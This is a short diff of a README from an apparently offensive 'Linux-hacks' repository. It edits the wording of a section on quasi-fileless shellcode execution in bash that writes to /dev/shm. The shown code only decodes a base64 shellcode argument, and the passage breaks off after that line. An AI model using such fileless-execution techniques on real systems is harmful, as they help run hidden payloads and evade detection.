tav-r/Linux-hacks/README.md

 ```

 ### executing schellcode from `bash`
-Quasi-fileless (assuming writing to `/dev/shm` is considered fileless) execution of shellcode can also be achieved by using `bash` scripting only.
+Quasi-fileless (assuming writing to `/dev/shm` is considered fileless) execution of shellcode can also be achieved using `bash` scripting only.
 ```bash
 # read first function argument
 shellcode=$(base64 -d <<<$1)